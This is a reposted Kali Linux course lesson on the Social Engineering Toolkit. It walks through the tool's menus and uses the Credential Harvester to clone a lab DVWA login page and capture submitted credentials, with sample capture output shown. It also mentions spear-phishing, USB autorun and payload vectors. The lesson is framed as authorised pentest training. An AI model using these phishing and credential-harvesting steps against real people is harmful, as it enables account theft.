DEV Community

Cover image for SET Social Engineering Toolkit 2026 β€” Spear-Phishing, Credential Harvesting & Payloads | Kali Linux Day 26
Mr Elite
Mr Elite

Posted on • Originally published at securityelites.com

SET Social Engineering Toolkit 2026 β€” Spear-Phishing, Credential Harvesting & Payloads | Kali Linux Day 26

πŸ“° Originally published on Securityelites β€” AI Red Team Education β€” the canonical, fully-updated version of this article.

SET Social Engineering Toolkit 2026 β€” Spear-Phishing, Credential Harvesting & Payloads | Kali Linux Day 26

πŸ—‘οΈ KALI LINUX COURSE

FREE

Part of the 180-Day Kali Linux Mastery Course

Day 26 of 180 Β· 14.4% complete

⚠️ Authorised Engagements Only. SET automates attacks that look convincingly real. Every exercise targets your own lab environment. Phishing real targets without written authorisation is illegal.

βœ… Before You Start

  • Day 25 β€” BeEF-XSS β€” browser hooking via XSS. SET takes the same attack surface into the human layer: instead of hooking a browser through a vulnerability, we deliver the payload through a convincing phishing email or cloned site.
  • Kali Linux running Β· Python3 + SET installed (pre-installed in Kali) Β· DVWA or your own test webserver for cloning

Every pentest report I write includes a social engineering finding. Not because clients ask for it β€” they usually don’t β€” but because the technical controls they’ve spent hundreds of thousands on are bypassed the moment someone clicks a convincing email. SET (Social Engineering Toolkit) is the tool that demonstrates that gap in an authorised, reproducible way. Today I show you the full SET workflow: credential harvester, spear-phishing email vector, and the payload delivery chain that turns a convincing login page into an exploitation path.

🎯 What You’ll Master in Day 26

Launch SET and navigate the Social Engineering Attacks menu
Run the Credential Harvester to clone a login page and capture credentials
Craft and send a spear-phishing email with a payload link
Understand SET’s payload delivery options and when each applies
Write a social engineering finding for a pentest report

⏱️ 40 min read Β· 3 exercises Β· Day 26 of 180 ### πŸ“‹ Day 26 β€” SET Social Engineering Toolkit 1. SET Overview β€” Architecture and Attack Vectors 2. Credential Harvester β€” Clone and Capture 3. Spear-Phishing Email Attack Vector 4. Payload Delivery β€” Executable and HTA Files 5. Reporting Social Engineering Findings SET sits at the intersection of ethical hacking methodology and web security β€” it automates the human-layer attacks that OWASP describes theoretically. The Phishing URL Scanner is the blue team tool that defends against exactly what SET creates. Understanding both sides is the approach I take in every engagement. The full tool reference is in the Kali Linux Commands reference.

SET Overview β€” Architecture and Attack Vectors

SET (Social Engineering Toolkit) is a Python-based framework created by TrustedSec. It automates the construction and delivery of social engineering attacks for authorised penetration testing. My most-used attack vectors are the Credential Harvester (clones a legitimate login page and captures submitted credentials) and the Spear-Phishing Email Vector (delivers a payload via crafted email). Both demonstrate the human attack surface to clients who believe technical controls alone are sufficient.

LAUNCHING SET AND NAVIGATING THE MENUCopy

Launch SET (requires root)

sudo setoolkit

Main menu:

1) Social-Engineering Attacks ← primary menu
2) Penetration Testing (Fast-Track)
3) Third Party Modules

Social Engineering Attacks sub-menu

1) Spear-Phishing Attack Vectors ← email payload delivery
2) Website Attack Vectors ← credential harvester, tabnabbing
3) Infectious Media Generator ← USB autorun payloads
4) Create a Payload and Listener ← MSF payload generation
5) Mass Mailer Attack ← bulk phishing campaign

Website Attack Vectors sub-menu (most used)

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method ← TODAY
4) Tabnabbing Attack Method
5) Web Jacking Attack Method

Credential Harvester β€” Clone and Capture

The Credential Harvester clones a target website’s login page, hosts it on my Kali machine, and captures any credentials submitted through the fake page β€” forwarding the victim to the real site afterwards so they don’t notice. The clone is pixel-perfect because SET scrapes the real HTML. The victim sees their normal login page, submits credentials, gets redirected to the real site, and never realises their password was captured.

CREDENTIAL HARVESTER β€” STEP BY STEPCopy

Navigation path in SET

Main Menu β†’ 1 (Social Engineering) β†’ 2 (Website Attacks) β†’ 3 (Credential Harvester)

SET asks: Site Cloner or Custom Import?

1) Web Templates β†’ pre-built templates (Gmail, Facebook, etc.)
2) Site Cloner β†’ clone ANY URL (most useful in assessments)
3) Custom Import β†’ supply your own HTML

Site Cloner workflow

IP address for the POST back: [YOUR KALI IP]
Enter the URL to clone: http://localhost/dvwa/login.php

SET clones the page, starts web server on port 80

Output: [*] Cloning the website: http://localhost/dvwa/login.php

[*] This could take a little bit…

[*] Harvester is ready, start sending mails

Victim visits: http://YOUR_KALI_IP/

They see cloned DVWA login, submit credentials

SET output shows:

[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=password

securityelites.com

SET Credential Harvester β€” Credential Capture Output
[] Harvester is ready, start sending mails
[
] SET Web Server is listening on port: 80
…victim visits cloned page and submits credentials…
[] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=password
[
] WHEN YOU’RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Captured credentials saved to: /root/.set/reports/

πŸ“Έ SET Credential Harvester output showing captured credentials. The β€œ[*] WE GOT A HIT!” line appears the moment a victim submits the cloned login form. SET captures the raw POST data β€” username, password, and any other form fields. The victim is simultaneously redirected to the real DVWA login page, so from their perspective the login simply β€œfailed once and then worked.” In a real engagement, this output appears in my terminal while I’m watching the phishing campaign β€” each credential submission is logged with timestamp and full field values.


πŸ“– Read the complete guide on Securityelites β€” AI Red Team Education

This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on Securityelites β€” AI Red Team Education β†’


This article was originally written and published by the Securityelites β€” AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit Securityelites β€” AI Red Team Education.

Top comments (0)